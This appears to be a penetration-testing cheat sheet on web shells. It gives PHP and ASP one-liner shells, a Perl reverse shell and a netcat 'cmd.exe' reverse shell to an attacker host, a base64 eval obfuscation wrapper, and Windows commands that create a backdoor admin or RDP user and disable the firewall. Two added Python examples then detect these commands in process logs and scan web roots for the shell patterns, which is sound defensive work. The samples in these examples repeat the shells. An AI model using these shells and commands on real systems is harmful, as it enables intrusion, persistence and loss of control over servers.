Web Shells


PHP

One liner.

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Retrieve uploaded files from phpinfo()

POST /phpinfo.php HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae
Content-Length: 196

-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security Test
-----------------------------7db268605ae--

WINDOWS | reverse shells

Windows is a bit of a different animal because it doesn't come with the same beautiful command line tools that spoil us in Linux. If we need a reverse shell, our entry point was most likely some kind of file upload capability or RCE, often through a web application.

Firstly, if you happen to find a Windows system with Perl (unlikely), give this a whirl (source):

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Otherwise, we have a couple of options:

  • Attempt to download nc.exe, and then run something along the lines of “nc.exe -e cmd.exe attackerip 1234”.
  • If we are dealing with an IIS server, create our own .asp or .aspx reverse shell payload with msfvenom, and then execute it.
  • PowerShell injection

Here are some other useful commands on Windows. If the machine you're facing has RDP enabled (port 3389), you can often create your own user, add it to the "Remote Desktop Users" group, then just log in via Remote Desktop.

Add a user on windows:

net user $username $password /add

Add a user to the “Remote Desktop Users” group:

net localgroup "Remote Desktop Users" $username /add

Make a user an administrator:

net localgroup administrators $username /add

Disable the Windows firewall on newer versions:

netsh advfirewall set allprofiles state off

Disable the Windows firewall on older versions of Windows:

netsh firewall set opmode disable
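
From the defender's side, every command in this Windows section leaves a process-creation record (Security event 4688 with command-line auditing enabled, or Sysmon event 1). The script below is an added example, not code from the original page: it runs simple detection rules for exactly these commands over a handful of constructed records, groups hits per host, and scores the combination that matters most here (a new local account added to the RDP or administrators group, run from an IIS application-pool identity). Host names, user names and command lines in SAMPLE_RECORDS are constructed for the example; the `net1` alias and the `IIS APPPOOL\` identity prefix are real Windows conventions.

```python
import re
from collections import defaultdict

# Added example (not from the original page): detection rules for the
# post-exploitation commands listed above, applied to constructed
# process-creation records shaped like 4688 / Sysmon 1 command lines.
NET = r"\bnet1?(?:\.exe)?\s+"          # net.exe, or its alias net1.exe
RULES = [
    ("local-account-created",
     re.compile(NET + r"user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("rdp-group-add",
     re.compile(NET + r'localgroup\s+"?remote desktop users"?\s+\S+\s+/add\b', re.I)),
    ("admin-group-add",
     re.compile(NET + r"localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("firewall-disabled",
     re.compile(r"\bnetsh\s+(?:advfirewall\s+set\s+allprofiles\s+state\s+off"
                r"|firewall\s+set\s+opmode\s+disable)\b", re.I)),
    ("netcat-shell",
     re.compile(r"\bnc(?:\.exe)?\s+.*-e\s+cmd(?:\.exe)?\b", re.I)),
]


def classify_command(cmd):
    """Return the names of every rule the command line matches (case-insensitive)."""
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(records):
    """Group (user, rule) hits per host; hosts with no hits are left out."""
    by_host = defaultdict(list)
    for rec in records:
        for tag in classify_command(rec["cmd"]):
            by_host[rec["host"]].append((rec["user"], tag))
    return dict(by_host)


def severity(host_hits):
    """Score one host: distinct rules, plus bonuses for persistence and web-app context."""
    tags = {tag for _, tag in host_hits}
    score = len(tags)
    # account creation followed by RDP/admin group membership is the persistence
    # chain described in this section
    if "local-account-created" in tags and tags & {"rdp-group-add", "admin-group-add"}:
        score += 2
    # a web server's application-pool identity running these commands points at
    # a web shell as the entry point
    if any(user.upper().startswith("IIS APPPOOL\\") for user, _ in host_hits):
        score += 2
    return score


# Constructed records: one compromised web server and one admin doing routine work.
SAMPLE_RECORDS = [
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "cmd": "net user backdoor Example123 /add"},
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "cmd": 'net localgroup "Remote Desktop Users" backdoor /add'},
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "cmd": "NetSh Advfirewall set allprofiles state off"},
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "cmd": "C:\\temp\\nc.exe -e cmd.exe 203.0.113.5 1234"},
    {"host": "FS02", "user": "CORP\\helpdesk", "cmd": "net user /domain"},
    {"host": "FS02", "user": "CORP\\helpdesk", "cmd": "netsh advfirewall show allprofiles"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_RECORDS).items():
        print(host, "severity", severity(hits), sorted({t for _, t in hits}))
```

The rules key on the `/add` and `state off` / `opmode disable` arguments on purpose, so read-only uses of `net` and `netsh` (listing users, showing firewall state) do not fire; in a real pipeline the same functions would be fed parsed event fields rather than the inline list.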


ASP One Liner

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

PHP Obfuscation

eval(base64_decode("<base64 encoded>"));
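
The PHP one-liner at the top of the page, the ASP one-liner and this eval(base64_decode(...)) wrapper are the shapes a defender most often has to find on a compromised document root. The scanner below is an added example and not code from the original page: it matches those three patterns in source text, unwraps quoted base64 literals so the obfuscated form is scanned for what it hides, and walks a directory tree of .php/.asp/.aspx files. The sample strings are the page's own one-liners plus a constructed benign file; the rule names and the `scan_tree` extension list are this example's own choices. It is a text heuristic, not a parser, so hits are leads for manual review.

```python
import base64
import os
import re

# Added example (not from the original page): static scan for the web-shell
# patterns this page lists, plus one level of base64 unwrapping.
EXEC_FUNCS = r"\b(?:shell_exec|system|passthru|exec|popen|proc_open|assert)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\s*\["

RULES = [
    # shell_exec($_GET['e'] ...): command string taken straight from the request
    ("exec-from-request",
     re.compile(EXEC_FUNCS + r"\s*\(\s*" + REQUEST_INPUT, re.I)),
    # eval(base64_decode("...")): the obfuscation form shown on this page
    ("eval-base64",
     re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I)),
    # eval of anything that includes request data, decoded or not
    ("eval-from-request",
     re.compile(r"\beval\s*\([^;]*" + REQUEST_INPUT, re.I)),
    # CreateObject("WScript.Shell").Exec(Request...): the ASP one-liner shape
    ("asp-wscript-exec",
     re.compile(r"CreateObject\s*\(\s*[\"']WScript\.Shell[\"']\s*\)\s*\.\s*Exec\s*\(\s*Request\b", re.I)),
]

# Quoted base64 literal handed to base64_decode; 16+ chars skips short tokens.
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]{16,})[\"']")


def decode_base64_literals(src):
    """Decode quoted base64 arguments so the wrapped payload can be scanned too."""
    out = []
    for blob in B64_LITERAL.findall(src):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
    return out


def scan_source(src, depth=0):
    """Return sorted rule names matched by src; hits inside decoded payloads get a 'decoded:' prefix."""
    hits = {name for name, rx in RULES if rx.search(src)}
    if depth < 2:  # unwrap eval(base64_decode(...)) a couple of layers deep
        for inner in decode_base64_literals(src):
            hits.update("decoded:" + h for h in scan_source(inner, depth + 1))
    return sorted(hits)


def scan_tree(root, exts=(".php", ".phtml", ".asp", ".aspx")):
    """Walk a document root and map each flagged file path to its findings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Samples: the one-liners from this page, an obfuscated wrapper built around
# the PHP one, and a constructed benign file that also reads $_GET.
PHP_ONE_LINER = "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>"
ASP_ONE_LINER = '<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>'
INNER = "echo shell_exec($_GET['e'].' 2>&1');"
PHP_OBFUSCATED = '<?php eval(base64_decode("%s")); ?>' % base64.b64encode(INNER.encode()).decode()
BENIGN = "<?php echo htmlspecialchars($_GET['name']); ?>"

if __name__ == "__main__":
    for label, src in [("php", PHP_ONE_LINER), ("asp", ASP_ONE_LINER),
                       ("obfuscated", PHP_OBFUSCATED), ("benign", BENIGN)]:
        print(label, scan_source(src))
```

Point `scan_tree()` at a web root to get a path-to-findings map; the benign sample shows why the rules key on exec/eval functions rather than on superglobals alone, since ordinary code reads $_GET too.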